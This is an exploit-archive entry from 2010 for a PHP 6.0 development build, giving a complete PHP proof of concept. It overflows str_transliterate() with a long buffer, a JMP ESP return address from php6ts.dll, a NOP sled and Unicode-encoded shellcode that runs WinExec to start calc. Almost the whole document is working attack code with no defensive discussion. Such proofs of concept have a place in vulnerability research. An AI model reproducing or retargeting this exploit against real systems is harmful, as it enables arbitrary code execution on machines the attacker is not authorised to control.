PHP 6.0 Dev str_transliterate() Buffer Overflow

`  
  
# Exploit Title: PHP 6.0 Dev str_transliterate() 0Day Buffer Overflow Exploit  
# Date: 2010-04-04  
# Author: Pr0T3cT10n  
# Software Link: http://downloads.sourceforge.net/project/wampserver/WampServer%202%20-%20Extensions/PHP/WampServer2-PHP6.0dev.exe?use_mirror=garr  
# Version: 6.0 Dev  
# Tested on: WIN XP HEB SP3  
# CVE: no.  
# Code:  
<?php  
error_reporting(0);  
#####################################################################  
## PHP 6.0 Dev str_transliterate() 0Day Buffer Overflow Exploit  
## Tested on WIN XP HEB SP3, Apache, PHP 6.0 Dev  
## Buffer Overflow  
## Bug discovered by Pr0T3cT10n, <[email protected]<mailto:[email protected]>>  
## Exploited by TheLeader, Debug  
## SP. Thanks: HDM  
## http://www.nullbyte.org.il  
#####################################################################  
## This code should exploits a buffer overflow in the str_transliterate() function to call WinExec and execute CALC  
## Take a look, 'unicode.semantics' has to be on!  
## php.ini > unicode.semantics = on  
#####################################################################  
if(ini_get_bool('unicode.semantics')) {  
$buff = str_repeat("\u4141", 256);  
$eip = "\u1445\u10A9"; # 0x10A91445 JMP ESP @ php6ts.dll  
$nops = str_repeat("\u9090", 20);  
  
# WinExec Calc XP SP3 HEB Unicode-encoded shellcode  
$shellcode = "\u02EB\u05EB\uF9E8\uFFFF\u33FF\u5BC0\u4388\u8315\u11C3\uBB53\u250D\u7C86\uD3FF\u6163\u636C\u414E";  
  
$exploit = $buff.$eip.$nops.$shellcode;  
str_transliterate(0, $exploit, 0);  
} else {  
exit("Error! 'unicode.semantics' has be on!\r\n");  
}  
  
function ini_get_bool($a) {  
$b = ini_get($a);  
switch (strtolower($b)) {  
case 'on':  
case 'yes':  
case 'true':  
return 'assert.active' !== $a;  
case 'stdout':  
case 'stderr':  
return 'display_errors' === $a;  
default:  
return (bool) (int) $b;  
}  
}  
?>  
  
  
  
`